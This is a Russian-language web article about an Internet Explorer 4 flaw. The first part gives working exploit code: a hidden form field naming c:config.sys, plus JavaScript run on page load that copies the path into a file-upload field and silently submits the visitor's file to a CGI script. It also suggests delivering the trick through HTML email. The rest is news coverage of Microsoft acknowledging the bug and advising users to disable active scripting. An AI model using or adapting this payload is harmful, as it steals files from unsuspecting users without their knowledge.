div.main {margin-left: 20pt; margin-right: 20pt}Браузер Microsoft открывает хакерам доступ к жестким дискам пользователей.
Проблема в том, что с помощью JavaScript в IE4 и выше можно
выполнить команды Copy и Paste, а также отправить форму без ведома
пользователя. Итак, создаем форму, в ней скрытое поле <input
type="hidden" name="T1" value="c:config.sys">, поле для выбора
файлов
<input type="file" name="filename" value="c:config.sys">,
после чего пишем следующий код (разумеется, вызывающийся в <body
onLoad=...>): function
getfile()
{
document.forms[1].T1.select();
document.execCommand("copy");
document.forms[0].filename.select();
document.execCommand("paste");
document.forms[0].submit();
}
Ну а дальше за дело берется cgi-скрипт. Конечно, это
сработает только если не отключено предупреждение об отправлении
формы, но как показывает практика, нормальные люди делают это
практически сразу. Разумеется, это все можно использовать и в
html-сообщениях, не томясь в ожидании захода жертвы на нужную
страницу.
Корпорация Microsoft признала наличие одного дефекта в системе
обеспечения безопасности своего браузера Internet Explorer,
используя который хакеры, знающие, что искать, могут просматривать
файлы на жестких дисках посетителей своих Web-узлов.
Операционная система Windows 98 со своей встроенной версией
Internet Explorer также уязвима для основанных на использовании
данной ошибки атак. По словам представителя Microsoft по связям с
прессой, дефект проявляется в версиях IE 4.0 и 4.01 для Windows 3.1,
Windows 95, NT 3.51 и NT 4. Эта ошибка, на которую внимание
разработчиков Microsoft было обращено полторы недели назад, не
является в полном смысле "брешью в крепостной стене". Как заявила
представитель компании по связям с прессой, для просмотра информации
хакеру необходимо составить считывающий ее сценарий, содержащий
точные имена интересующих его файлов. По ее словам, компания не
получила еще ни одного сообщения от своих клиентов, в котором бы
говорилось о вызванных этой ошибкой проблемах.
Пока разработчики Microsoft трудятся над исправлением программы,
компания рекомендует своим пользователям защититься от возможных
неприятностей путем отключения функции active scripting для всех зон
безопасности Internet Explorer. Исправленная версия ПО будет
опубликована на Web-узле Microsoft в разделе Internet Explorer
Security Area.
В прошлом месяце разработчики Microsoft уже исправляли
аналогичную ошибку в Explorer.
|